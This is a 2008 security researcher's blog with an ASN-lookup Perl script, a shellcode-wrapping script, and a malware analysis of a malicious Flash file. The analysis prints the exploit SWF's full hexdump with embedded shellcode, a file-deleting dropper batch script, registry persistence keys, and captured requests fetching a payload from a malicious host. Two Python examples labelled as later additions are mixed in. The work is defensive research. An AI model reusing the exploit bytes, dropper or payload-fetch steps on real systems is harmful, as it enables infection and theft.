Sunday, July 13, 2008

USB as a Threat Vector

Over the past weeks I have monitored several incidents per week of clients bringing in infected USB media and hard drives. USB-aware malware is increasing and becoming a more common feature of Internet-delivered maladies. This gives the malware a path to infect machines laterally within an organization, in addition to infecting them directly from the Internet.

Wednesday, July 2, 2008

Script to identify domains and IP addresses by ASN and CC

I wrote this more than a year ago and it has been tested pretty well. Figured since Jim over at ISC has released a similar tool, it's time to publish mine.

Usage:
# cat > queries.txt
domain1
domain2
ip3
domain4
ip5
...
^C
# perl finger.pl queries.txt

###### finger.pl ######

#This work is licensed under the Creative Commons Attribution-Share Alike 3.0 United States License. To view a copy of this license, visit http://creativecommons.org/licenses/by-sa/3.0/us/ or send a letter to Creative Commons, 171 Second Street, Suite 300, San Francisco, California, 94105, USA.


#!/usr/bin/perl
# finger.pl: for each IP or domain (one per line in a file, or a single argument)
# print "ip | netblock | cc | asn | AS description". Lookups go through dig against
# Team Cymru's origin.asn.cymru.com and asn.cymru.com TXT services.

die "usage: $0 <queries.txt | ip | domain>\n" unless @ARGV;

if (-e "$ARGV[0]") {
    open(IFILE, "$ARGV[0]") or die "cannot open $ARGV[0]: $!\n";
    while (<IFILE>) {
        chomp;
        undef $ipaddr; undef @whois_results; undef @resolve_results; undef $domainname; undef $a;
        if (/^\s*$/) {
            next;                                        # skip blank lines
        } elsif (/^\s*(\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3})\s*$/) {
            $ipaddr = $1;
            @whois_results = &whois($ipaddr);
            foreach $a (@whois_results) { print "$a\n"; }
        } elsif (/.+?\..{1,4}$/) {                       # a name ending in a 1-4 character TLD
            $domainname = $_;
            @resolve_results = &resolve($domainname);
            foreach $a (@resolve_results) { print "$a\n"; }
        } else { print "BAD INPUT LINE: $_\n"; }
    }
    close(IFILE);
} elsif ($ARGV[0] =~ /^\s*(\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3})\s*$/) {
    $ipaddr = $1;
    @whois_results = &resolve($ipaddr);                  # resolve() adds rDNS in front of the whois line
    # @whois_results = &whois($ipaddr);
    foreach $a (@whois_results) { print "$a\n"; }
} elsif ($ARGV[0] =~ /.+?\..{1,4}$/) {
    $domainname = $ARGV[0];
    @resolve_results = &resolve($domainname);
    foreach $a (@resolve_results) { print "$a\n"; }
} else { print "BAD INPUT: $ARGV[0]\n"; }


# resolve: for an IP, return "rdns-name | whois line" (or "NO RDNS | ..."); for a
# name, resolve it with dig and return "name | whois line" for each A record.
# CNAME targets are resolved recursively.
sub resolve {
    my $domain = shift;
    my @resultr;
    if ($domain =~ /^\s*(\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3})\s*$/) {
        $domain = $1;
        my @answersr = `dig +short -x $domain`;
        chomp(@answersr);
        @answersr = ('') unless @answersr;               # still report the IP when there is no PTR
        foreach my $answerr (@answersr) {
            $answerr =~ s/\.$//;                         # strip the trailing dot from the PTR name
            foreach my $whois_answerr (&whois($domain)) {
                my $infor = ($answerr =~ /^\s*$/) ? join(' | ', "NO RDNS", $whois_answerr)
                                                  : join(' | ', $answerr, $whois_answerr);
                push @resultr, $infor;
            }
        }
        return @resultr;
    } elsif ($domain !~ /^[A-Za-z0-9.-]+$/) {
        # only hostname characters may reach the shell command below
        print "BAD DOMAIN: $domain\n";
        return ("$domain | UNKNOWN");
    } else {
        my @answersr = `dig +short $domain`;
        chomp(@answersr);
        push @resultr, "$domain | COULD NOT RESOLVE" unless @answersr;
        foreach my $answerr (@answersr) {
            if ($answerr =~ /^\s*(\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3})\s*$/) {
                foreach my $whois_answerr (&whois($1)) {
                    push @resultr, join(' | ', $domain, $whois_answerr);
                }
            } else {
                $answerr =~ s/\.$//;                     # CNAME target: resolve it in turn
                push @resultr, &resolve($answerr);
            }
        }
        return @resultr;
    }
}


# whois: look up the origin AS for an IP through Team Cymru's DNS service and
# return "ip | netblock | cc | asn | AS description", one line per origin ASN.
sub whois {
    my $ip = shift;
    my @results;
    if ($ip =~ /^(\d{1,3})\.(\d{1,3})\.(\d{1,3})\.(\d{1,3})$/) {
        my ($octet1, $octet2, $octet3, $octet4) = ($1, $2, $3, $4);

        # Perform the IP WHOIS lookup and parse the result
        # (answer format: "asn(s) | prefix | cc | registry | allocated")
        my @answers = `dig +short -t TXT $octet4.$octet3.$octet2.$octet1.origin.asn.cymru.com`;
        chomp(@answers);
        foreach my $answer (@answers) {
            $answer =~ s/\t//g;
            $answer =~ s/\"//g;
            $answer =~ s/\s\|\s/\|/g;
            my ($ip_as, $ip_netblock, $ip_cc, $ip_as_source, $ip_as_date) = split /\|/, $answer;

            # The ASN field may list several ASNs separated by spaces; look each one up.
            foreach my $asn (split ' ', $ip_as) {
                # Perform the AS WHOIS lookup and parse the result
                # (answer format: "asn | cc | registry | allocated | description")
                my $as_answer = `dig +short -t TXT AS$asn.asn.cymru.com`;
                chomp($as_answer);
                $as_answer =~ s/\t//g;
                $as_answer =~ s/\"//g;
                $as_answer =~ s/\s\|\s/\|/g;
                my ($as_num, $as_cc, $as_source, $as_date, $as_desc) = split /\|/, $as_answer;

                push @results, join(' | ', sprintf("%15.15s", $ip), sprintf("%18.18s", $ip_netblock),
                                           sprintf("%2.2s", $ip_cc), sprintf("%5.5s", $asn), $as_desc);
            }
        }
        return @results;
    } else {
        print "BAD IP ADDRESS: $ip\n";
        return ("$ip | UNKNOWN");
    }
}
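The same two-step Team Cymru lookup that finger.pl performs, written out in Python as an added example (this is not the author's code). It assumes the answer layouts of the origin.asn.cymru.com and asn.cymru.com TXT services, passes the query name to dig as an argument list instead of through a shell, and ships with constructed answers so it runs offline; the prefix, country code and AS name in those answers are taken from the "Malicious Flash Badness" entry on this page, while the registry and allocation dates are made up.

```python
import re
import subprocess

# Team Cymru's DNS-based IP-to-ASN service, the same one finger.pl queries.
ORIGIN_ZONE = "origin.asn.cymru.com"
ASN_ZONE = "asn.cymru.com"

IPV4 = re.compile(r"^(\d{1,3})\.(\d{1,3})\.(\d{1,3})\.(\d{1,3})$")


def is_ipv4(text):
    """True for a dotted quad whose octets are all in range."""
    m = IPV4.match(text.strip())
    return bool(m) and all(int(o) <= 255 for o in m.groups())


def origin_name(ip):
    """Build the reversed-octet query name, e.g. 172.104.46.125.origin.asn.cymru.com."""
    if not is_ipv4(ip):
        raise ValueError("not an IPv4 address: %r" % ip)
    return ".".join(reversed(IPV4.match(ip.strip()).groups())) + "." + ORIGIN_ZONE


def dig_txt(name):
    """Fetch TXT strings with dig. The name goes to dig as an argument, never through
    a shell, so a line from the query file cannot smuggle in a command."""
    proc = subprocess.run(["dig", "+short", "-t", "TXT", name],
                          capture_output=True, text=True, check=False)
    return [line.strip().strip('"') for line in proc.stdout.splitlines() if line.strip()]


def parse_fields(txt):
    """Split an answer such as '4837 | 125.40.0.0/13 | CN | apnic | 2000-01-01'."""
    return [f.strip() for f in txt.split("|")]


def asn_lookup(ip, query_txt=dig_txt):
    """Return one record per origin ASN for ip.

    Each origin answer is 'asn(s) | prefix | cc | registry | allocated'; the ASN field
    may hold several ASNs separated by spaces. The description comes from a second
    query, AS<n>.asn.cymru.com, answered as 'asn | cc | registry | allocated | description'."""
    records = []
    for txt in query_txt(origin_name(ip)):
        fields = parse_fields(txt)
        if len(fields) < 5:
            continue  # malformed answer: skip it rather than guess
        for asn in fields[0].split():
            as_txt = query_txt("AS%s.%s" % (asn, ASN_ZONE))
            as_fields = parse_fields(as_txt[0]) if as_txt else []
            records.append({
                "ip": ip.strip(), "asn": asn, "prefix": fields[1], "cc": fields[2],
                "registry": fields[3], "allocated": fields[4],
                "as_desc": as_fields[4] if len(as_fields) >= 5 else "UNKNOWN",
            })
    return records


def format_record(r):
    """Same column order finger.pl prints: ip | netblock | cc | asn | description."""
    return " | ".join([r["ip"], r["prefix"], r["cc"], r["asn"], r["as_desc"]])


# Constructed answers so the example runs offline (registry and dates are made up).
SAMPLE_ANSWERS = {
    "172.104.46.125.origin.asn.cymru.com":
        ["4837 | 125.40.0.0/13 | CN | apnic | 2000-01-01"],
    "AS4837.asn.cymru.com":
        ["4837 | CN | apnic | 2000-01-01 | CHINA169-BACKBONE CNCGROUP China169 Backbone"],
}


def stub_txt(name):
    """Offline stand-in for dig_txt."""
    return SAMPLE_ANSWERS.get(name, [])


if __name__ == "__main__":
    for rec in asn_lookup("125.46.104.172", stub_txt):
        print(format_record(rec))
```

Swap `stub_txt` for the default `dig_txt` to run it against the live service; the only thing the stub changes is where the TXT strings come from.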

Wednesday, May 28, 2008

Malicious Flash Badness

This started after reading the first entry of this SANS story: http://isc.sans.org/diary.html?storyid=4468

Tooled with the dropper, did a little Flash version research and discovered this link worked out:

www_play0nlnie_com/pcd/topics/ff11us/20080311cPxl31/WIN%209,0,115,0ie.swf

FLARE/FLASM scream about overflow of tags.

bt collectedfiles # cat __20080527-1113_www_play0nlnie_com_pcd_topics_ff11us_20080311cPxl31_WIN_9_0_115_0ie_flr
movie 'WIN 9,0,115,0ie.swf' {
// flash 9, total frames: 771, frame rate: 12 fps, 550x400 px

// unknown tag 86 length 40

// unknown tag 86 length 12

// unknown tag 82 length 383

// unknown tag 76 length 25
}


SWF hex

bt collectedfiles # hexdump -C __20080527-1342_www_play0nlnie_com_pcd_topics_ff11us_20080311cPxl31_WIN_9_0_115_0ie_swf
00000000 46 57 53 09 0a 06 00 00 78 00 05 5f 00 00 0f a0 |FWS.....x.._....|
00000010 00 00 0c 03 03 44 11 08 00 00 00 bf 01 00 04 00 |.....D..........|
00000020 00 aa 02 34 d1 f5 25 13 ed 2b 45 e9 a8 90 9b 67 |...4..%..+E....g|
00000030 65 1d aa d1 5a b0 ec 91 05 6f 6b 7e 4f 9a 2a 62 |e...Z....ok~O.*b|
00000040 06 f4 a0 6d a4 3b ca c9 15 2e a8 e6 e6 40 ca 36 |...m.;.......@.6|
00000050 2d 4a ab dd 70 01 fe 25 78 ed b9 a3 54 30 f4 f1 |-J..p..%x...T0..|
00000060 cf d2 f2 e3 e1 63 e6 85 34 35 45 77 33 e4 3d 4b |.....c..45Ew3.=K|
00000070 72 10 af 86 45 59 a3 f8 c1 27 29 75 ae 34 28 2b |r...EY...')u.4(+|
00000080 7c e5 7d a7 57 7c ee c8 e6 0c d0 91 4c df f4 41 ||.}.W|......L..A|
00000090 04 27 a8 94 9a 18 e4 0e 7d 63 02 b3 bf 22 76 12 |.'......}c..."v.|
000000a0 1d 24 02 10 a6 3d 5d 3e 4c 73 ab bf b6 c2 d7 88 |.$...=]>Ls......|
000000b0 af bd ab 68 75 cc b2 b9 4d 5c b5 30 ae a5 f5 82 |...hu...M\.0....|
000000c0 42 74 69 03 37 8e 94 e2 87 22 d3 9e bc 57 2d 64 |Bti.7...."...W-d|
000000d0 cc 76 f3 72 9e 3c 5d a4 58 c1 d5 53 64 a0 a4 a8 |.v.r.<].X..Sd...|
000000e0 84 32 c0 7d b4 91 d8 8a c2 3f 70 5e e6 17 24 60 |.2.}.....?p^..$`|
000000f0 eb 16 5b 33 c9 66 b8 d8 15 66 31 04 4b 41 40 66 |..[3.f...f1.KA@f|
00000100 81 f9 63 01 7c f3 eb 05 e8 e5 ff ff ff 31 70 db |..c.|........1p.|
00000110 15 da 4a b1 25 85 71 56 14 55 8d 77 15 e0 15 6a |..J.%.qV.U.w...j|
00000120 55 ee 9e 93 09 49 9e 8d 1d 6d e2 66 f9 e8 17 e9 |U....I...m.f....|
00000130 15 6f ce 9e 12 2b 53 c9 dc bc 4b bc 7f f9 4c 19 |.o...+S...K...L.|
00000140 fb f3 15 f3 f7 0d 55 75 2d 35 60 0d 9c be 25 93 |......Uu-5`...%.|
00000150 17 a3 fd 65 14 fc 15 1f ec 94 14 a6 7d 6f 78 01 |...e........}ox.|
00000160 16 6a 63 71 7a 69 42 8e 10 ee 06 06 16 08 83 e1 |.jcqziB.........|
00000170 a8 0b 16 0b 7e 31 56 0d 16 64 e9 65 e9 2e cd 3d |....~1V..d.e...=|
00000180 32 42 46 47 e9 42 36 9e d2 7e e9 e8 e9 e7 7e e6 |2BFG.B6..~....~.|
00000190 e9 e5 e9 4f 46 e3 40 01 5e 6b 15 e0 40 30 7c 11 |...OF.@.^k..@0|.|
000001a0 4f 46 9d 3a 9b 8f 16 21 16 26 9d bc be 28 16 29 |OF.:...!.&...(.)|
000001b0 9d d7 40 c2 f6 2c 16 2d 48 dd b3 71 9d 4e 32 d9 |..@..,.-H..q.N2.|
000001c0 33 33 16 33 7c 2e 7c 38 7c 36 9d f2 15 3c 8a ff |33.3|.|8|6...<..|
000001d0 11 52 51 90 d0 3b d5 b6 68 16 fe 35 17 40 16 2b |.RQ..;..h..5.@.+|
000001e0 2b 28 20 29 31 cf d3 46 12 da d0 40 7e 0f bd 8f |+( )1..F...@~...|
000001f0 11 89 9d 35 0e a4 f9 4d 16 4e 7e 27 1e 5a 16 39 |...5...M.N~'.Z.9|
00000200 7e 5a 1c 53 7e 01 9d b9 7c dd 12 cb bd 6b d6 09 |~Z.S~...|....k..|
00000210 46 30 e9 d0 12 c0 bc d0 a8 6d 17 5f 16 37 7e 9e |F0.......m._.7~.|
00000220 16 62 16 9c 40 60 15 a2 d1 66 79 15 6c 46 d1 29 |.b..@`...fy.lF.)|
00000230 12 0f 6e 0e 16 3b e9 3b 1e 5d cd 3c 45 27 9b 37 |..n..;.;.].<E'.7|
00000240 22 22 45 8c 40 58 25 b5 9d 8a 7c 65 4f d3 f4 84 |""E.@X%...|eO...|
00000250 70 bd 52 5f 2a 7d 17 f6 ea f3 51 6f 47 d7 46 d0 |p.R_*}....QoG.F.|
00000260 47 d3 47 d2 47 d5 9b 13 25 87 16 87 44 d9 e9 df |G.G.G...%...D...|
00000270 1a 0b d2 df 14 8c 16 ec e9 ff fa 4d 12 90 9d c7 |...........M....|
00000280 26 d3 4d c1 15 75 15 74 15 77 15 76 95 74 12 c3 |&.M..u.t.w.v.t..|
00000290 45 11 cc 79 e1 ce e9 7d fe 85 e9 60 e9 ca 3f f9 |E..y...}...`..?.|
000002a0 20 2f 42 87 12 69 38 67 36 a6 7c 97 4e 12 16 aa | /B..i8g6.|.N...|
000002b0 e8 d5 e9 b9 d4 8c 16 c7 24 f6 ac af 15 4e 69 4e |........$....NiN|
000002c0 04 70 32 b3 ae 44 16 b5 16 80 9b e3 32 bc db 97 |.p2..D......2...|
000002d0 d4 ae 16 03 03 bd 16 bd fd bb ae a0 17 c0 16 7b |...............{|
000002e0 16 c1 e8 bc e9 d6 d4 d1 16 94 42 ad 12 a2 36 9e |..........B...6.|
000002f0 e9 9c 02 91 d5 9d 9d 88 2a 8b 9d 93 3e af 5b d2 |........*...>.[.|
00000300 cb 59 05 d0 c3 e7 df 9c 57 5d 12 5d 9b 9c 3e db |.Y......W].]..>.|
00000310 76 e9 df d4 a8 cc 2c 0b 62 d6 d7 16 11 e3 dc a1 |v.....,.b.......|
00000320 fd 13 2f ec 77 91 f7 6e 55 f6 15 22 9d ec 9e 42 |../.w..nU.."...B|
00000330 4f 29 47 bd 9d 99 2a 66 62 c0 6e ec e3 a6 9d 87 |O)G...*fb.n.....|
00000340 36 f1 e3 c0 df bd 57 58 15 33 25 2c 19 46 06 c3 |6.....WX.3%,.F..|
00000350 c0 8e 1e 3a dd fb 15 27 56 15 e7 c4 09 75 f0 5f |...:...'V....u._|
00000360 9c 5c 33 00 ca 62 9c 09 5c 8d 49 1b 14 d5 9c 0d |.\3..b..\.I.....|
00000370 9c 09 d2 a0 49 55 d4 e5 81 f3 e8 f0 25 64 86 1d |....IU......%d..|
00000380 2e f0 6a 90 6e 2d f1 8d cd 5e 6c 2a 6e 97 db 79 |..j.n-...^l*n..y|
00000390 09 be 73 f4 e7 54 6c 20 8e f4 87 a2 9e 6e ad 3e |..s..Tl .....n.>|
000003a0 e6 6f 32 f6 5a a5 27 34 97 f0 b8 bd 17 28 17 29 |.o2.Z.'4.....(.)|
000003b0 7f 5e 63 5b 2d 03 38 5a 60 59 39 5f 7b 51 6e 01 |.^c[-.8Z`Y9_{Qn.|
000003c0 79 5e 79 5a 72 1a 74 5a 7a 19 76 4f 39 5d 6f 5c |y^yZr.tZz.vO9]o\|
000003d0 17 15 f5 78 4e 13 19 59 6c 18 01 6f 21 ed a7 13 |...xN..Yl..o!...|
000003e0 db 97 bf a1 52 c6 f7 18 c2 ee c1 7e bc 24 43 64 |....R......~.$Cd|
000003f0 bb 2e 44 f8 f7 5d 1d f6 23 28 10 fa 0b 11 91 ec |..D..]..#(......|
00000400 d1 50 dc a4 aa 66 5e e6 df e3 d3 5e 82 a8 30 42 |.P...f^....^..0B|
00000410 00 68 94 36 9a a4 f8 24 e2 78 d1 15 c0 5f cd ce |.h.6...$.x..._..|
00000420 2c a8 15 99 b4 8e a0 08 20 20 20 20 20 20 20 20 |,.......        |
00000430 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 |                |
00000440 20 20 20 20 20 20 20 20 20 20 43 43 02 ff ff ff |          CC....|
00000450 bf 15 0c 00 00 00 01 00 e5 9c ba e6 99 af 20 31 |.............. 1|
00000460 00 00 bf 14 7f 01 00 00 01 00 00 00 00 10 00 2e |................|
00000470 00 00 00 00 10 07 6e 65 77 5f 66 6c 61 0c 4d 61 |......new_fla.Ma|
00000480 69 6e 54 69 6d 65 6c 69 6e 65 0d 66 6c 61 73 68 |inTimeline.flash|
00000490 2e 64 69 73 70 6c 61 79 09 4d 6f 76 69 65 43 6c |.display.MovieCl|
000004a0 69 70 14 6e 65 77 5f 66 6c 61 3a 4d 61 69 6e 54 |ip.new_fla:MainT|
000004b0 69 6d 65 6c 69 6e 65 06 66 72 61 6d 65 31 00 0e |imeline.frame1..|
000004c0 61 64 64 46 72 61 6d 65 53 63 72 69 70 74 06 4f |addFrameScript.O|
000004d0 62 6a 65 63 74 0c 66 6c 61 73 68 2e 65 76 65 6e |bject.flash.even|
000004e0 74 73 0f 45 76 65 6e 74 44 69 73 70 61 74 63 68 |ts.EventDispatch|
000004f0 65 72 0d 44 69 73 70 6c 61 79 4f 62 6a 65 63 74 |er.DisplayObject|
00000500 11 49 6e 74 65 72 61 63 74 69 76 65 4f 62 6a 65 |.InteractiveObje|
00000510 63 74 16 44 69 73 70 6c 61 79 4f 62 6a 65 63 74 |ct.DisplayObject|
00000520 43 6f 6e 74 61 69 6e 65 72 06 53 70 72 69 74 65 |Container.Sprite|
00000530 07 16 01 16 03 18 05 17 01 16 07 16 0a 00 0b 07 |................|
00000540 01 02 07 02 04 07 04 06 07 05 08 07 05 09 07 06 |................|
00000550 0b 07 02 0c 07 02 0d 07 02 0e 07 02 0f 04 00 00 |................|
00000560 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 |................|
00000570 01 02 08 03 00 02 01 03 01 00 01 00 00 01 03 01 |................|
00000580 01 04 01 00 04 00 01 01 09 0a 03 d0 30 47 00 00 |............0G..|
00000590 01 02 01 0a 0b 09 f8 62 8f ff ff 02 02 02 47 00 |.......b......G.|
000005a0 00 02 03 01 0a 0b 0f d0 30 d0 49 00 5d 04 24 00 |........0.I.].$.|
000005b0 60 03 4f 04 02 47 00 00 03 02 01 01 09 27 f8 62 |`.O..G.......'.b|
000005c0 79 f8 62 75 f8 e8 25 fb ff ff 00 f8 29 02 f8 63 |y.bu..%.....)..c|
000005d0 79 02 02 02 02 02 02 02 02 02 02 02 02 02 02 02 |y...............|
000005e0 02 02 02 02 47 00 00 3f 13 19 00 00 00 01 00 00 |....G..?........|
000005f0 00 6e 65 77 5f 66 6c 61 2e 4d 61 69 6e 54 69 6d |.new_fla.MainTim|
00000600 65 6c 69 6e 65 00 40 00 00 00 |eline.@...|
0000060a
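To see what FLARE was complaining about without trusting the file, the header and tag records of an SWF can be walked by hand. The following is an added example in Python, not one of the tools used above: it decodes the header (signature, version, declared length, stage rectangle, frame rate, frame count) and then lists each tag's code and length, stopping as soon as a tag claims more bytes than remain. The embedded sample is the first 33 bytes of the hexdump above (offsets 0x00 to 0x20), deliberately cut off there, so the second tag shows up as oversized; the decoded 550x400 px, 12 fps and 771 frames agree with the FLARE output, and the declared length of 1546 matches the file size listed under "Watch for these files". Tag names are the ones given in the SWF file format specification.

```python
import struct
import zlib

# First 33 bytes of the hexdump above (offsets 0x00-0x20): the 21-byte header, the
# FileAttributes tag and the record header of the next tag. The rest is left out on
# purpose so the walker has to handle a truncated file.
SAMPLE_PREFIX = bytes.fromhex(
    "46 57 53 09 0a 06 00 00 78 00 05 5f 00 00 0f a0"
    "00 00 0c 03 03 44 11 08 00 00 00 bf 01 00 04 00"
    "00"
)

TAG_NAMES = {0: "End", 6: "DefineBits", 69: "FileAttributes", 76: "SymbolClass",
             82: "DoABC", 86: "DefineSceneAndFrameLabelData"}


def read_bits(data, bit_offset, nbits):
    """Read nbits starting at bit_offset, most significant bit first (SWF bit fields)."""
    value = 0
    for i in range(nbits):
        byte = data[(bit_offset + i) // 8]
        value = (value << 1) | ((byte >> (7 - (bit_offset + i) % 8)) & 1)
    return value


def decompress_if_needed(data):
    """CWS files carry a zlib-compressed body after the 8-byte header."""
    if data[:3] == b"CWS":
        return b"FWS" + data[3:8] + zlib.decompress(data[8:])
    return data


def parse_header(data):
    """Decode an uncompressed header. Returns (header dict, offset of the first tag)."""
    if data[:3] != b"FWS":
        raise ValueError("not an uncompressed SWF: %r" % data[:3])
    version = data[3]
    declared_len = struct.unpack_from("<I", data, 4)[0]
    nbits = read_bits(data, 64, 5)          # RECT: 5-bit field width, then 4 fields in twips
    xmin, xmax, ymin, ymax = (read_bits(data, 69 + i * nbits, nbits) for i in range(4))
    pos = 8 + (5 + 4 * nbits + 7) // 8      # RECT is padded out to a byte boundary
    frame_rate = struct.unpack_from("<H", data, pos)[0] / 256.0   # 8.8 fixed point
    frame_count = struct.unpack_from("<H", data, pos + 2)[0]
    header = {"version": version, "declared_len": declared_len,
              "width_px": (xmax - xmin) // 20, "height_px": (ymax - ymin) // 20,
              "frame_rate": frame_rate, "frame_count": frame_count}
    return header, pos + 4


def walk_tags(data, pos):
    """List (code, name, length, status) per tag record. A tag whose declared length
    runs past the end of the data is reported as 'oversized' and ends the walk,
    rather than being trusted."""
    tags = []
    while pos + 2 <= len(data):
        code_and_len = struct.unpack_from("<H", data, pos)[0]
        code, length = code_and_len >> 6, code_and_len & 0x3F
        pos += 2
        if length == 0x3F:                  # long form: a 32-bit length follows
            if pos + 4 > len(data):
                tags.append((code, TAG_NAMES.get(code, "unknown"), None, "truncated"))
                break
            length = struct.unpack_from("<I", data, pos)[0]
            pos += 4
        status = "ok" if length <= len(data) - pos else "oversized"
        tags.append((code, TAG_NAMES.get(code, "unknown"), length, status))
        if status != "ok" or code == 0:
            break
        pos += length
    return tags


def analyse(data):
    """Header plus tag list for a file image, compressed or not."""
    data = decompress_if_needed(data)
    header, first_tag = parse_header(data)
    return header, walk_tags(data, first_tag)


if __name__ == "__main__":
    hdr, tags = analyse(SAMPLE_PREFIX)
    print(hdr)
    for tag in tags:
        print(tag)
```

Run it over the whole file rather than the prefix and every tag is listed, including the ones the older tool labelled "unknown"; the length check is the part worth keeping, since a tag length that disagrees with the file size is exactly the kind of inconsistency a parser should refuse instead of reading past.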


ISC handler Adrien de Beaupre got the drop calls out. Collecting these, I was able to determine the following:

ax.exe

DNS queries to 'www_1ive_net'. Resolves
82.98.86.169.

0040 ed 90 47 45 54 20 2f 63 6f 75 6e 74 2f 6e 65 77 ..GET /count/new
0050 73 2e 61 73 70 20 48 54 54 50 2f 31 2e 30 0d 0a s.asp HTTP/1.0..
0060 41 63 63 65 70 74 3a 20 2a 2f 2a 0d 0a 48 6f 73 Accept: */*..Hos
0070 74 3a 20 77 77 77 2e 31 69 76 65 2e 6e 65 74 0d t: www.1ive.net.
0080 0a 55 73 65 72 2d 41 67 65 6e 74 3a 20 4d 6f 7a .User-Agent: Moz
0090 69 6c 6c 61 2f 34 2e 30 20 28 63 6f 6d 70 61 74 illa/4.0 (compat
00a0 69 62 6c 65 3b 20 4d 53 49 45 20 36 2e 30 3b 20 ible; MSIE 6.0;
00b0 57 69 6e 64 6f 77 73 20 4e 54 20 35 2e 30 29 0d Windows NT 5.0).
00c0 0a 41 63 63 65 70 74 2d 45 6e 63 6f 64 69 6e 67 .Accept-Encoding
00d0 3a 20 67 7a 69 70 2c 20 64 65 66 6c 61 74 65 0d : gzip, deflate.
00e0 0a 0d 0a ...

Looks like a tracker. The rest of the return looks like click generation (click fraud).

Drops %system%\disk.dll and test.bat to clean up the retrieved swf.

bt brak # cat WINE_COMPARISON_ax.exe.txt_collection/test.bat
:ha
del "Z:\mnt\sda1\collections\20080527-swf\brak\ax.exe"
if exist "Z:\mnt\sda1\collections\20080527-swf\brak\ax.exe" goto ha
del /f /s /q "%userprofile%\Local Settings\Temporary Internet Files\*.swf"
del %0




Then resolves 'www_play0nlnie_com' to 125.46.104.172 and pulls setip.exe

179 223.948001 192.168.10.22 -> 125.46.104.172 HTTP GET /setip.exe HTTP/1.0

0000 00 02 b3 a1 8d 6f 00 0c 29 fb a3 48 08 00 45 00 .....o..)..H..E.
0010 00 d6 fd ee 40 00 40 06 8b 9a c0 a8 0a 16 7d 2e ....@.@.......}.
0020 68 ac e2 a1 00 50 9b 1a 84 60 ac 79 fe fe 80 18 h....P...`.y....
0030 01 6d 5e 31 00 00 01 01 08 0a df 2a 79 b7 1a 5b .m1.......*y..[
0040 b4 7a 47 45 54 20 2f 73 65 74 69 70 2e 65 78 65 .zGET /setip.exe
0050 20 48 54 54 50 2f 31 2e 30 0d 0a 41 63 63 65 70 HTTP/1.0..Accep
0060 74 3a 20 2a 2f 2a 0d 0a 48 6f 73 74 3a 20 77 77 t: */*..Host: ww
0070 77 2e 70 6c 61 79 30 6e 6c 6e 69 65 2e 63 6f 6d w.play0nlnie.com
0080 0d 0a 55 73 65 72 2d 41 67 65 6e 74 3a 20 4d 6f ..User-Agent: Mo
0090 7a 69 6c 6c 61 2f 34 2e 30 20 28 63 6f 6d 70 61 zilla/4.0 (compa
00a0 74 69 62 6c 65 3b 20 4d 53 49 45 20 36 2e 30 3b tible; MSIE 6.0;
00b0 20 57 69 6e 64 6f 77 73 20 4e 54 20 35 2e 30 29 Windows NT 5.0)
00c0 0d 0a 41 63 63 65 70 74 2d 45 6e 63 6f 64 69 6e ..Accept-Encodin
00d0 67 3a 20 67 7a 69 70 2c 20 64 65 66 6c 61 74 65 g: gzip, deflate
00e0 0d 0a 0d 0a ....

Attempts to drop a keylogger, but fails in WINE.

fixme:reg:RegRestoreKeyW (0x50,L"c:\\windows\\temp\\xTemp.sys",8): stub



Drops %system%\smart.dll and sets for start

< [Software\\Cn91x\\Fly] 1211905209
< "DllName"="smart.dll"
< "Shutdown"="DoStartup"
< "Startup"="DoShutdown"


Injects into explorer.exe and iexplore.exe.

So, in sum: backchannel, keylogger, infostealer.gamepass RK. Nice... Similar to the last two weeks' SQL injections....

0x0080: 0000 003f 4761 6d65 5573 6572 3d00 020a ...?GameUser=...
0x0090: 0000 0026 4761 6d65 5061 7373 3d00 e516 ...&GamePass=...


Watch for these IPs and domains

domain | ip | netblock | cc | asn | AS description
www.play0nlnie.com | 125.46.104.172 | 125.40.0.0/13 | CN | 4837 | CHINA169-BACKBONE CNCGROUP China169 Backbone
www.1ive.com | 82.98.86.169 | 82.98.64.0/18 | DE | 12306 | Plus.Line AG IP-Services


Watch for these files

file                   size (bytes)  md5
08.swf                 201           52d170bd4e7b2c3b7b2276dc4e38cb3f
test.bat               214           83d3d1f07c0e93d985785e0e50bb2280
org.bat                171           6d1c59a28c01e9c77fe75b01090aa9b6
setip.exe              66560         91467a37bc29d35c36e6d054e4d03cc5
disk.dll               484352        c063edc2d2e88f331faddc030137d89c
ax.exe                 19456         94237921f585b9926a4d37bd43a4b101
WIN%209,0,115,0ie.swf  1546          4f5f1f3986a302c7c4a5d15a190e9d69
07.swf                 200           1dc543c3b15afb0c4d7e416126ac6356
smart.dll              35840         1a2936ad26bd7c497e106745e672884f
07.jpg                 1339          5da0fcfd8b8a6fecdebf7441be99416f
news.asp               52901         fd49617f408041e89b3165c92f7c88b5

Sunday, April 20, 2008

Automated Shellcode Analysis

Working with Lenny Zeltser in his SANS Malware Analysis course, I was able to cobble together a script to automate shellcode analysis preparation. The analysis involves wrapping the shellcode in a shell function, then compiling it into a small program. There are several ways to do this, including using an empty C main function (Lenny) and injecting the shellcode into a husk executable (iDefense). I didn't want to use the injection method since it falls prey to two problems. 1) The husk is always the same size, only the shellcode changes (might be good for diff comparisons). I wanted something smaller. 2) The shellcode must fit into the blank space in the husk, which opens it up to possible overflow attack or, at least, shellcode size limitation. Compiling yourself avoids this problem.

Here's the script I hacked together. With a little work, I plan to put it to a CGI frontend with a return of the disassembled output.

Shellcode Analysis Script

bt shellcodetest # cat shellcode_analyzer.sh
#!/bin/sh
# a little script to clean up shellcode, parse it, convert to
# little-endian, and compile into the smallest wrapper possible.
# based on instruction provided by Lenny Zeltser.

# hacked together by
# Andrew Hunt
# 4/19/08
# Copyright 2008 Creative Commons Share-Alike
# http://creativecommons.org/licenses/by-sa/3.0/us/

# this script is very alpha, assuming you will call with a text file
# argument. text file should have the unicode pasted in it,
# like `./shellcode_analyzer.sh shellcode.unicodeorhex.strings.file`.
# it comes without any warranties or promises.
#
# user needs to replace the script path and script for unescaping
# unicode/hex/other with the path to their own script or an unescaping
# routine.
# some replacement suggestions if you don't have a script...
#
# perl -pe 's/\\x(..)/chr(hex($1))/ge'
# perl -pe 's/[\%\\]u(..)(..)/pack("v", hex($1.$2))/ge'   # %uXXYY is a 16-bit unit: emit bytes YY XX

# strip the '+' and "+" string concatenation and the quotes, then unescape to raw bytes
